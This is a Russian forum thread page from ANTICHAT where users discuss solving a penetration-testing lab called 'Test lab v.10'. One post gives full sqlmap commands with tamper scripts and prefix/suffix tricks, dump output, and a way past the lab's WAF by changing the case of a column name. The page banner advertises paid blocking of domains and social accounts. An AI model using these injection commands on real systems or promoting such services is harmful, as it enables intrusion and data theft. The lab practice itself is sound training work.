Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (2) | ANTICHAT — форум по информационной безопасности и программированию

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
Лаборатория тестирования на проникновение «Test lab v.10» — за гранью хакерских возможностей (2)

Страница 3 из 3

Опции темы

Поиск в этой теме

Опции просмотра

#21

19.01.2017, 20:58

mastanggt

Новичок

Регистрация: 17.01.2017

Сообщений: 0

С нами: 4905682

Репутация: 0

А почему в конце пишем

Цитата:

~~DarkNode~~ сказал(а):

-- -

а не просто -- ?
-- это начинается комментарий, а зачем еще одна черточка через пробел?

#22

28.01.2017, 14:22

MrBa

Новичок

Регистрация: 10.01.2017

Сообщений: 11

С нами: 4915766

Репутация: 0

Цитата:

~~DarkNode~~ сказал(а):

Вот пару старых моих видео про работу руками если кому интересно:

эх, оооооочень интересно (( ... хочется глянуть на работу мастера. Зачем там хайд?

#23

09.02.2017, 09:31

MrBa

Новичок

Регистрация: 10.01.2017

Сообщений: 11

С нами: 4915766

Репутация: 0

У меня вопрос по PAYLOAD. Из дампера у меня есть готовый пэйлоад. Дамп качает крокозябры и никак не могу получить нормальный результат. Пробую мэпом - говорит что атрибут не имеет уязвимости. Как в мэп вставить готовый PAYLOAD из дампа?
Спасибо

#24

19.04.2017, 21:15

pyz

Новичок

Регистрация: 02.02.2017

Сообщений: 0

С нами: 4881558

Репутация: 0

Цитата:

ghostphisher сказал(а):

Как обычно на отлично!
Теперь у меня остался один не решенный вопрос - --code=200 --prefix "')" --suffix=" -- - " <--- если бы это не было указано, скульмап не нашел бы это самостоятельно. Из чего получается, что с префиксами и суфиксами требуется ручная работа. Верно я понимаю?

дополнение:

[18:54:24] [INFO] analyzing table dump for possible password hashes
Database: site
Table: users
[1 entry]
+----+-----------+
| id | username |
+----+-----------+
| 1 | e.lindsey |
+----+-----------+

Но хэша нет...

sqlmap --tamper randomcase --random-agent --level 5 --code=200 --prefix "')" --suffix=" -- - " --risk 3 -v 2 --url "http://192.168.101.9:443/post.php?id=*" --technique U -D site --threads 10 --tables --common-tables -T users --dump

пробовал так. что опять упустил?

ЕСТЬ КОНТАКТ!!! Для того что-бы вытянуть хеш из колонки "password" в таблице "users" была оставлена подсказка самим автором в посте))), а именно автором было указано что колонка "password" защищена WAFом, меняем регистр на "PasSwoRd" и вуаля...
sqlmap -u http://192.168.101.9:443/post.php?id=1 -p id --flush-session --tamper randomcase --random-agent --threads 10 -D site -T users -C username,PasSwoRd --dump --batch

#25

05.01.2018, 17:26

Qmakake

Новичок

Регистрация: 20.12.2017

Сообщений: 0

С нами: 4419817

Репутация: 0

Спасибо за статью, очень круто!!!
[doublepost=1515158804,1513804098][/doublepost]спасибо огромное за статьи, очень интересно.
Вы как профессионал, могли бы посоветовать какую-то школу, курсы или книги по обучению ИБ и пентесту в частности!?